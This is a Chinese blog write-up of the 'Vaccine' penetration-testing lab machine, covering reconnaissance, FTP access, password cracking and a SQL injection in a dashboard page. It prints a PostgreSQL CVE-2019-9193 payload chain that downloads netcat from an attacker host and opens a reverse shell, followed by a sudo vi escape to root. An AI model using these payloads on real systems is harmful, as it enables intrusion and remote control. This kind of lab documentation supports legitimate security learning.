靶机-Vaccine
信息搜集#
nmap 扫了下,打开了 21,22,和 80 端口,
ftp 居然可以根据上台机器给了 ftp 密码登录,,可是我都不知道密码在哪?ftpuser/mc@F1l3ZilL4
-
刚开始没有反应,猜测又是防火墙,果然是,,,
ufw allow from 10.10.10.27 proto tcp
后,才可以dir
找文件,发现文件get back.zip
下载 -
解压文件
unzip back.zip
,发现有密码破解:使用 kali 的自带
rockyou.txt
字典破解,,shell:john hash --fork=4 -w rockyou.txt 2>/dev/null
,但是没反应,,,密码741852963
得到 web 页面的密码,md5 解码后
qwerty789
web 漏洞#
报错,存在 sql 注入,sqlmap 走一波

sqlmap 命令--dump-all
爆出所有数据库所有信息
--os-shell
得到 shell 权限
不知道怎么用
其他方法
- 所有 9.3 以上版本的 PostgreSQL 都容易受到这种任意命令执行(CVE-2019-9193)
Payload --> http://10.10.10.46/dashboard.php?search=a';DROP TABLE IF EXISTS cmd_31554; -- -
Payload --> http://10.10.10.46/dashboard.php?search=a';CREATE TABLE cmd_31554(cmd_output text); -- -
Payload --> http://10.10.10.46/dashboard.php?search=a';COPY cmd_31554 FROM PROGRAM 'wget -P /tmp/31554 http://10.10.14.33:80/nc'; -- -#这里要注意是下载nc的意思,所以需要在主机开一个局域网,并且在nc所在的目录下。。不然会报错
Payload --> http://10.10.10.46/dashboard.php?search=a';COPY cmd_31554 FROM PROGRAM 'chmod 777 /tmp/31554/nc'; -- -#给权限
Payload --> http://10.10.10.46/dashboard.php?search=a';COPY cmd_31554 FROM PROGRAM '/tmp/31554/nc 10.10.16.64 4444 -e /bin/bash'; -- #具体使用nc的操作
python3 -c "import pty;pty.spawn('/bin/bash')";
进入更友好的 shell 界面
sudo -l
查看当前用户能够使用的 root 命令
提权#
编辑文件sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
输入:!/bin/sh
或者:shell
即可
作者:kzd的前沿思考
出处:https://www.cnblogs.com/Fram3/p/15676539.html
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· PostgreSQL 和 SQL Server 在统计信息维护中的关键差异
· C++代码改造为UTF-8编码问题的总结
· DeepSeek 解答了困扰我五年的技术问题
· 为什么说在企业级应用开发中,后端往往是效率杀手?
· 用 C# 插值字符串处理器写一个 sscanf
· 为DeepSeek添加本地知识库
· 精选4款基于.NET开源、功能强大的通讯调试工具
· DeepSeek智能编程
· [翻译] 为什么 Tracebit 用 C# 开发
· 腾讯ima接入deepseek-r1,借用别人脑子用用成真了~